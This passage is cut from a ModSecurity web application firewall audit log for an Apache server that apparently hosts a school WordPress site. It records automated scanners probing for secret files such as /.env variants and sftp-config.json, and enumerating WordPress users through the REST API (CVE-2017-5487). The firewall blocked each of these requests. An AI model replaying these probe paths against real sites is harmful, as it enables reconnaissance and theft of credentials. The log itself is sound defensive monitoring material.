(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748779590167215 2630 (- - -) Stopwatch2: 1748779590167215 2630; combined=1199, p1=390, p2=780, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f551cb14-Z-- --860cb37b-A-- [01/Jun/2025:19:13:41 +0700] aDxD9UaTRmdfB-FaJjnzyAAAAAo 103.236.140.4 42646 103.236.140.4 8181 --860cb37b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 128.199.182.55 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 128.199.182.55 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --860cb37b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --860cb37b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748780021652586 656 (- - -) Stopwatch2: 1748780021652586 656; combined=239, p1=208, p2=0, p3=0, p4=0, p5=31, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --860cb37b-Z-- --a6a35f47-A-- [01/Jun/2025:19:36:18 +0700] aDxJQu4LjVe0Eerk_ZbAsAAAAEQ 103.236.140.4 42820 103.236.140.4 8181 --a6a35f47-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.92.107.174 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.92.107.174 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a6a35f47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6a35f47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748781378762543 657 (- - -) Stopwatch2: 1748781378762543 657; combined=234, p1=212, p2=0, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6a35f47-Z-- --27ff0f5e-A-- [01/Jun/2025:19:49:02 +0700] aDxMPgQHT18O7PnXxsRFrgAAAJY 103.236.140.4 42904 103.236.140.4 8181 --27ff0f5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.145.142.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.145.142.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --27ff0f5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27ff0f5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748782142555304 3086 (- - -) Stopwatch2: 1748782142555304 3086; combined=1307, p1=446, p2=829, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27ff0f5e-Z-- --2531505e-A-- [01/Jun/2025:20:01:43 +0700] aDxPN-4LjVe0Eerk_ZbEigAAAFQ 103.236.140.4 59182 103.236.140.4 8181 --2531505e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.200.53.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.200.53.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2531505e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2531505e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748782903172899 3086 (- - -) Stopwatch2: 1748782903172899 3086; combined=1433, p1=535, p2=862, p3=0, p4=0, p5=36, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2531505e-Z-- --ba907340-A-- [01/Jun/2025:20:14:03 +0700] aDxSG-4LjVe0Eerk_ZbKgAAAAFE 103.236.140.4 54864 103.236.140.4 8181 --ba907340-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --ba907340-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba907340-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783643597497 770 (- - -) Stopwatch2: 1748783643597497 770; combined=346, p1=311, p2=0, p3=0, p4=0, p5=35, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba907340-Z-- --d1c0477d-A-- [01/Jun/2025:20:14:03 +0700] aDxSG-4LjVe0Eerk_ZbKgQAAAE8 103.236.140.4 54874 103.236.140.4 8181 --d1c0477d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d1c0477d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1c0477d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783643836031 799 (- - -) Stopwatch2: 1748783643836031 799; combined=343, p1=302, p2=0, p3=0, p4=0, p5=41, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1c0477d-Z-- --60fc7b2b-A-- [01/Jun/2025:20:14:04 +0700] aDxSHAQHT18O7PnXxsROFwAAAIw 103.236.140.4 54892 103.236.140.4 8181 --60fc7b2b-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --60fc7b2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60fc7b2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644176162 847 (- - -) Stopwatch2: 1748783644176162 847; combined=351, p1=300, p2=0, p3=0, p4=0, p5=50, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60fc7b2b-Z-- --2e057101-A-- [01/Jun/2025:20:14:04 +0700] aDxSHAQHT18O7PnXxsROGAAAAIs 103.236.140.4 54894 103.236.140.4 8181 --2e057101-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --2e057101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e057101-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644414607 735 (- - -) Stopwatch2: 1748783644414607 735; combined=303, p1=264, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e057101-Z-- --e7d18408-A-- [01/Jun/2025:20:14:04 +0700] aDxSHAQ4kZQGAOBHoB6QjAAAAMw 103.236.140.4 54904 103.236.140.4 8181 --e7d18408-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --e7d18408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7d18408-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644754308 872 (- - -) Stopwatch2: 1748783644754308 872; combined=352, p1=319, p2=0, p3=0, p4=0, p5=33, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7d18408-Z-- --b98add34-A-- [01/Jun/2025:20:14:04 +0700] aDxSHO4LjVe0Eerk_ZbKggAAAE4 103.236.140.4 54914 103.236.140.4 8181 --b98add34-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b98add34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b98add34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644992948 787 (- - -) Stopwatch2: 1748783644992948 787; combined=294, p1=257, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b98add34-Z-- --4af54526-A-- [01/Jun/2025:20:14:05 +0700] aDxSHQQHT18O7PnXxsROGQAAAIc 103.236.140.4 54928 103.236.140.4 8181 --4af54526-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --4af54526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4af54526-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783645333007 889 (- - -) Stopwatch2: 1748783645333007 889; combined=372, p1=323, p2=0, p3=0, p4=0, p5=49, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4af54526-Z-- --2fa6f222-A-- [01/Jun/2025:20:14:05 +0700] aDxSHQQHT18O7PnXxsROGgAAAJI 103.236.140.4 54934 103.236.140.4 8181 --2fa6f222-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --2fa6f222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fa6f222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783645571557 829 (- - -) Stopwatch2: 1748783645571557 829; combined=330, p1=280, p2=0, p3=0, p4=0, p5=50, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fa6f222-Z-- --f4d61449-A-- [01/Jun/2025:20:14:05 +0700] aDxSHQQ4kZQGAOBHoB6QlQAAAMI 103.236.140.4 54944 103.236.140.4 8181 --f4d61449-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --f4d61449-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4d61449-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783645910552 780 (- - -) Stopwatch2: 1748783645910552 780; combined=308, p1=274, p2=0, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4d61449-Z-- --68d60a23-A-- [01/Jun/2025:20:14:06 +0700] aDxSHu4LjVe0Eerk_ZbKgwAAAFQ 103.236.140.4 54958 103.236.140.4 8181 --68d60a23-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --68d60a23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d60a23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783646149042 734 (- - -) Stopwatch2: 1748783646149042 734; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d60a23-Z-- --7dca9f38-A-- [01/Jun/2025:20:14:06 +0700] aDxSHkaTRmdfB-FaJjn_ewAAAAU 103.236.140.4 54972 103.236.140.4 8181 --7dca9f38-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7dca9f38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dca9f38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783646489383 830 (- - -) Stopwatch2: 1748783646489383 830; combined=343, p1=308, p2=0, p3=0, p4=0, p5=35, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dca9f38-Z-- --6c76da04-A-- [01/Jun/2025:20:14:06 +0700] aDxSHgQHT18O7PnXxsROHAAAAJM 103.236.140.4 54978 103.236.140.4 8181 --6c76da04-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --6c76da04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c76da04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783646727923 769 (- - -) Stopwatch2: 1748783646727923 769; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c76da04-Z-- --7fe7153d-A-- [01/Jun/2025:20:21:50 +0700] aDxT7gQHT18O7PnXxsRRJQAAAIc 103.236.140.4 41220 103.236.140.4 8181 --7fe7153d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.33.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.33.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7fe7153d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fe7153d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748784110446691 870 (- - -) Stopwatch2: 1748784110446691 870; combined=392, p1=350, p2=0, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fe7153d-Z-- --40c5704e-A-- [01/Jun/2025:20:29:45 +0700] aDxVye4LjVe0Eerk_ZbSDwAAAFU 103.236.140.4 59682 103.236.140.4 8181 --40c5704e-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --40c5704e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c5704e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748784585613926 811 (- - -) Stopwatch2: 1748784585613926 811; combined=269, p1=228, 